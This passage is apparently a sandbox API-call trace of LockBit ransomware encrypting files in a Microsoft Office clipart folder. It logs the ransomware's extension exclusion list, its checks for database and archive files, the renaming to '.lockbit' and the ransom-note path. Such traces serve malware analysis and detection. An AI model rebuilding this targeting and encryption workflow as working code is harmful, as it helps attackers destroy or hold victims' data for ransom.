PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03379I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.492] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.492] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.492] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cee1d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x321f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03380I.JPG", cAlternateFileName="")) returned 1 [0173.492] lstrcmpiW (lpString1=".", lpString2="PH03380I.JPG") returned -1 [0173.492] lstrcmpiW (lpString1="..", lpString2="PH03380I.JPG") returned -1 [0173.492] PathFindExtensionW (pszPath="PH03380I.JPG") returned=".JPG" [0173.492] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.492] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.492] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.492] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.492] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.492] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.492] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.492] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.492] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.492] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.493] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.493] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03380I.JPG") returned 1 [0173.494] lstrcmpiW (lpString1="ntldr", lpString2="PH03380I.JPG") returned -1 [0173.494] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03380I.JPG") returned -1 [0173.494] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03380I.JPG") returned -1 [0173.494] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03380I.JPG") returned -1 [0173.494] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03380I.JPG") returned 1 [0173.494] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03380I.JPG") returned -1 [0173.494] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.494] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG") returned=".JPG" [0173.494] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.494] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.494] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.495] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.495] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.495] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG.lockbit") returned 72 [0173.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03380i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.496] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.496] malloc (_Size=0x40068) returned 0x3fb00b8 [0173.496] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3fb00d0 | out: lpFileSize=0x3fb00d0*=12831) returned 1 [0173.496] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00ec) returned 0x0 [0173.497] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.497] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.497] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3ff00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3ff00fc) returned 0x0 [0173.497] ReadFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0173.515] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.515] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.515] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0173.515] free (_Block=0x1fa2ed8) [0173.515] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03380I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.516] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.516] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a44b570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbdae, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH03425I.JPG", cAlternateFileName="")) returned 1 [0173.516] lstrcmpiW (lpString1=".", lpString2="PH03425I.JPG") returned -1 [0173.516] lstrcmpiW (lpString1="..", lpString2="PH03425I.JPG") returned -1 [0173.516] PathFindExtensionW (pszPath="PH03425I.JPG") returned=".JPG" [0173.516] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0173.516] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0173.516] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0173.517] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0173.517] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH03425I.JPG") returned 1 [0173.517] lstrcmpiW (lpString1="ntldr", lpString2="PH03425I.JPG") returned -1 [0173.518] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH03425I.JPG") returned -1 [0173.518] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH03425I.JPG") returned -1 [0173.518] lstrcmpiW (lpString1="autorun.inf", lpString2="PH03425I.JPG") returned -1 [0173.518] lstrcmpiW (lpString1="thumbs.db", lpString2="PH03425I.JPG") returned 1 [0173.518] lstrcmpiW (lpString1="iconcache.db", lpString2="PH03425I.JPG") returned -1 [0173.518] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.518] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG") returned=".JPG" [0173.518] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0173.518] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0173.518] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0173.519] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0173.519] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG.lockbit") returned 72 [0173.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03425i.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.520] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.520] malloc (_Size=0x40068) returned 0x3df0008 [0173.520] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=48558) returned 1 [0173.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0173.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0173.521] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0173.523] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.523] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.523] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.524] free (_Block=0x1fa2ed8) [0173.524] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.525] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.525] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xef6, dwReserved0=0x0, dwReserved1=0x0, cFileName="PRRT.WMF", cAlternateFileName="")) returned 1 [0173.525] lstrcmpiW (lpString1=".", lpString2="PRRT.WMF") returned -1 [0173.525] lstrcmpiW (lpString1="..", lpString2="PRRT.WMF") returned -1 [0173.525] PathFindExtensionW (pszPath="PRRT.WMF") returned=".WMF" [0173.525] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.525] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.526] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.526] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PRRT.WMF") returned 1 [0173.526] lstrcmpiW (lpString1="ntldr", lpString2="PRRT.WMF") returned -1 [0173.526] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PRRT.WMF") returned -1 [0173.526] lstrcmpiW (lpString1="bootsect.bak", lpString2="PRRT.WMF") returned -1 [0173.527] lstrcmpiW (lpString1="autorun.inf", lpString2="PRRT.WMF") returned -1 [0173.527] lstrcmpiW (lpString1="thumbs.db", lpString2="PRRT.WMF") returned 1 [0173.527] lstrcmpiW (lpString1="iconcache.db", lpString2="PRRT.WMF") returned -1 [0173.527] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.527] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRT.WMF") returned=".WMF" [0173.527] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.527] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.527] lstrcmpiW (lpString1=".db-wal", 